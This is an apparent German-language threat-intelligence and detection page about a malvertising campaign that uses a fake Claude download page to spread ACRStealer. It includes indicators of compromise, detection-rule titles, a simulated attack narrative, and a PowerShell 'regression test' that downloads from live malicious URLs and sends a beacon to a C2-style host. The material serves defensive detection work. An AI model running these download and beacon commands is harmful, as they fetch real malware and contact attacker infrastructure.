Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsforscher identifizierten eine bösartige Werbekampagne, die Benutzer auf eine gefälschte Claude-Downloadseite weiterleitet. Die Seite liefert je nach Betriebssystem des Opfers unterschiedliche Nutzlasten, wobei die Infektionskette von Windows zur Bereitstellung von ACRStealer führt. Ermittler verknüpften die Aktivität mit mehreren kompromittierten Domains und einem Befehls- und Steuerungsserver, der nach der Infektion verwendet wird. Die Kampagne verlässt sich auf verschleierte URLs und ein PowerShell-Skript, um die Nutzlastlieferung abzuschließen.
Untersuchung
Der Analyst verfolgte die Aktivität von der anfänglichen gefälschten Claude-Seite über mehrere umgeleitete URLs, die über verschiedene Domains gehostet wurden. Während der Infektionskette wurden ein ZIP-Archiv, ein PowerShell-Skript und ein JPEG-Bild heruntergeladen, gefolgt von einer HTTPS-Kommunikation mit einer Befehls- und Steuerungsdomain. Die Verkehrsanalyse bestätigte, dass das Netzwerkverhalten nach der Infektion mit der Infrastruktur der ACRStealer-Familie übereinstimmte.
Abschwächung
Organisationen sollten die identifizierten bösartigen Domains und URLs am Netzwerkperimeter blockieren. Werbeverkehr sollte gefiltert werden, um bösartige Anzeigen zu identifizieren, die auf die gefälschte Claude-Seite oder ähnliche Nachahmungsversuche hinweisen. Endpunktschutz sollte ebenfalls so konfiguriert werden, dass ACRStealer-bezogenes Verhalten und verdächtige PowerShell-Ausführungen erkannt werden.
Reaktion
Verteidiger sollten auf ausgehende Verbindungen zur Befehls- und Steuerungsdomain yw.enhanceblabber.cc überwachen und bei Downloads des identifizierten ZIP-Archivs und PowerShell-Skripts Alarm schlagen. Jeder Host, der damit verbundene Aktivitäten zeigt, sollte einer forensischen Sammlung möglicher ACRStealer-Artefakte unterzogen und isoliert werden, falls ein Kompromiss bestätigt wird.
Angriffsfluss
Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden
Benachrichtigen Sie michErkennungen
Verdächtiges LOLBAS-MSHTA-Verteidigungsausweichverhalten durch Erkennung der zugehörigen Befehle (via process_creation)
Ansicht
Verdächtige Befehls- und Steuerungskommunikation durch unübliches Top-Level-Domain (TLD)-DNS-Anfrage (via dns)
Ansicht
IOCs (HashSha256) zur Erkennung: Möglicher ACR Stealer von Seite, die Claude nachahmt
Ansicht
Erkennung der Verteilung von ACR Stealer über gefälschte Claude-Download-Seiten [Windows-Netzwerkverbindung]
Ansicht
Simulationsergebnis
Voraussetzung: Die Telemetrie- & Baseline-Vorflugkontrolle muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählung müssen die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
- Anfänglicher Köder: Der Angreifer sendet eine Phishing-E-Mail mit einem Link zu
https://fairpoint29.com/. Das Opfer klickt auf den Link, der eine gefälschte Claude-Download-Seite lädt. - Ausführung des bösartigen Downloaders: Die Seite löst automatisch einen Download von
https://primemetricsa.com/1518925aus, der eine getarnte Nutzlast liefert. - Abholung der Sekundärnutzlast: Der heruntergeladene Stub kontaktiert
https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42dum das vollständige ACR Stealer-Binary abzurufen. - C2-Beacon: Einmal ausgeführt, sendet die Malware ein Beacon an
https://i.ibb.co/Xx16sbMz/init-block.jpg(eine Technik, die die Bild-Hosting zur verdeckten C2 nutzt).
Jeder Schritt erzeugt einen Proxy-Protokolleintrag, der exakt mit den im Sigma-Regel definierten
DomainandurlWerten übereinstimmt und dadurch die Erkennungsbedingung erfüllt. - Anfänglicher Köder: Der Angreifer sendet eine Phishing-E-Mail mit einem Link zu
-
Regressionstest-Skript:
# ------------------------------------------------- # ACR Stealer Verteilungssimulation – Regel auslösen # ------------------------------------------------- # Schritt 1: Gefälschte Claude-Download-Seite (harmloses GET) Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null # Schritt 2: Downloader-Binärdatei (simuliert durch einen kleinen Dateidownload) Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing # Schritt 3: Vollständiges Nutzlastabruf Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" ` -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing # Schritt 4: C2-Beacon (POST einer kleinen Bilddatei, um den Verkehr zu tarnen) $body = [System.Text.Encoding]::UTF8.GetBytes("beacon") Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" ` -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null # ------------------------------------------------- # Ende der Simulation # ------------------------------------------------- -
Aufräumbefehle:
# Entfernen heruntergeladener Artefakte Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue # DNS-Cache leeren, um verbleibende Einträge zu vermeiden ipconfig /flushdns